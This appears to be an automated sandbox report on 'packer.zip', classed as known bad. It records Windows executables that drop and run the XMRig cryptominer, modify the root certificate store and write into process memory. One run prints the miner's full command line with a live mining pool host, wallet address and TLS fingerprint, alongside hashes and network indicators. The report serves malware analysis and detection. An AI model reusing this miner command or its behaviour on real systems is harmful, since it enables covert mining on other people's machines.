Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-13 07:36
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240508-en
Max time kernel
1706s
Max time network
1719s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:35
Platform
win10v2004-20240508-en
Max time kernel
1690s
Max time network
1703s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:35
Platform
win10v2004-20240508-en
Max time kernel
1550s
Max time network
1563s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 23.53.113.159:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:37
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4420 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4420 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 131.253.33.237:443 | g.bing.com | tcp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.33.253.131.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 171.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2300-14-0x000001A5F9000000-0x000001A5F9020000-memory.dmp
memory/2300-15-0x000001A5FAB10000-0x000001A5FAB30000-memory.dmp
memory/2300-16-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-17-0x000001A5FAB30000-0x000001A5FAB50000-memory.dmp
memory/2300-18-0x000001A5FAB50000-0x000001A5FAB70000-memory.dmp
memory/2300-19-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-20-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-21-0x000001A5FAB30000-0x000001A5FAB50000-memory.dmp
memory/2300-23-0x000001A5FAB50000-0x000001A5FAB70000-memory.dmp
memory/2300-22-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-24-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-25-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-26-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-27-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-28-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-29-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-30-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-31-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-32-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-33-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-34-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-35-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-36-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-37-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-38-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-39-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-40-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-41-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-42-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-43-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-44-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-45-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-46-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-47-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-48-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-49-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-50-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-51-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-52-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-53-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-54-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-55-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-56-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-57-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-58-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-59-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-60-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-61-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-62-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-63-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-64-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-65-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-66-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-67-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-68-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-69-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-70-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-71-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-72-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-73-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-74-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-75-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-76-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-77-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-78-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-79-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-80-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-81-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
memory/2300-82-0x00007FF616AD0000-0x00007FF6175D3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b9